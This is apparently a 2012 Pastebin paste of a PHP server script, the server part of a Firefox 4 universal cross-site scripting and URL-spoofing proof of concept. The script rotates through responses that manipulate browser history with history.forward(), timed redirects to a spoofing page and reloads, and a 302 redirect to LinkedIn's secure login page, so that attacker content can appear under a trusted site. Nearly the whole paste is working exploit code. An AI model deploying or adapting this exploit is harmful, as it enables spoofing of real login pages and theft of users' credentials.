Advertisement
Guest User

FF4-11 _UXSS - Server File

a guest
Jul 1st, 2012
254
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.11 KB | None | 0 0
  1. <?php
  2. if (!function_exists('sys_get_temp_dir')) {
  3.     // Based on http://www.phpit.net/article/creating-zip-tar-archives-dynamically-php/2/
  4.     // If the builtin PHP sys_get_temp_dir doesn't exist, we replace it with one that will
  5.     // try to guess from the environment.  Since sys_get_temp_dir() doesn't return a trailing
  6.     // slash on all system (see comment at http://us.php.net/sys_get_temp_dir), we don't
  7.     // append a trailing slash, and expect callers to append one when needed.
  8.     function sys_get_temp_dir()
  9.     {
  10.         // Try to get from environment variable
  11.         if (!empty($_ENV['TMP']))
  12.             return realpath($_ENV['TMP']);
  13.         if (!empty($_ENV['TMPDIR']))
  14.             return realpath($_ENV['TMPDIR']);
  15.         if (!empty($_ENV['TEMP']))
  16.             return realpath( $_ENV['TEMP']);
  17.         return "/tmp";
  18.     }
  19. }
  20.  
  21. if (!function_exists('file_put_contents')) {
  22.     function file_put_contents($filename, $data)
  23.     {
  24.         $handle = fopen($filename, "w");
  25.         if (!$handle)
  26.             return FALSE;
  27.         $bytesWritten = fwrite($handle, $data);
  28.         if (!fclose($handle))
  29.             return FALSE;
  30.         return $bytesWritten;
  31.     }
  32. }
  33.  
  34. // This script acts as a stateful proxy for retrieving files. When the state is set to
  35. // offline, it simulates a network error by redirecting to itself.
  36.  
  37. if (!sys_get_temp_dir()) {
  38.     echo "FAIL: No temp dir was returned.\n";
  39.     exit();
  40. }
  41.  
  42. function setState($newState, $file)
  43. {
  44.     file_put_contents($file, $newState);
  45. }
  46.  
  47. function getState($file)
  48. {
  49.     if (!file_exists($file)) {
  50.         return "Uninitialized";
  51.     }
  52.     return file_get_contents($file);
  53. }
  54.  
  55. function generateNoCacheHTTPHeader()
  56. {
  57.     header("Expires: Thu, 01 Dec 2003 16:00:00 GMT");
  58.     header("Cache-Control: no-cache, no-store, must-revalidate");
  59.     header("Pragma: no-cache");
  60. }
  61.  
  62. function redirect($url, $type=301)
  63. {
  64.   if ($type == 301) header("HTTP/1.1 301 Moved Permanently");
  65.   if ($type == 302) header("HTTP/1.1 302 Moved Temporarily");
  66.   header("Location: $url");
  67.   echo 'This page has moved to <a href="'.$url.'">'.$url.'</a>';
  68. }
  69.  
  70. function handleContentsAccordingToCount()
  71. {
  72.     $first_script="<b>Page1</b> <script> history.forward()</script>";
  73.     $third_script="<script>setTimeout(\"document.location='./spoofing.php#123'\", 1500);setTimeout(\"location.reload()\", 2100);setTimeout(\"history.forward()\", 3050);</script><b>Page2</b>";
  74.     $resourceCountFile = sys_get_temp_dir() . "/contents-count";
  75.     $resourceCount = getState($resourceCountFile);
  76.     if ($resourceCount == "Uninitialized") {
  77.       setState(0, $resourceCountFile);
  78.       $resourceCount = 0;
  79.     }
  80.     generateNoCacheHTTPHeader();
  81.     header("Content-Type: text/html");
  82.     if (($resourceCount % 3) == 0) {
  83.         header('HTTP/1.1 200 OK');    
  84.         echo $first_script;
  85.     } else if (($resourceCount % 3) == 1) {
  86.         echo $third_script;
  87.     } else {
  88.         redirect('https://www.linkedin.com/secure/login', 302);
  89.     }
  90.     setState($resourceCount + 1, $resourceCountFile);
  91. }
  92.  
  93. ob_start();
  94. handleContentsAccordingToCount();
  95. ob_end_flush();
  96. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement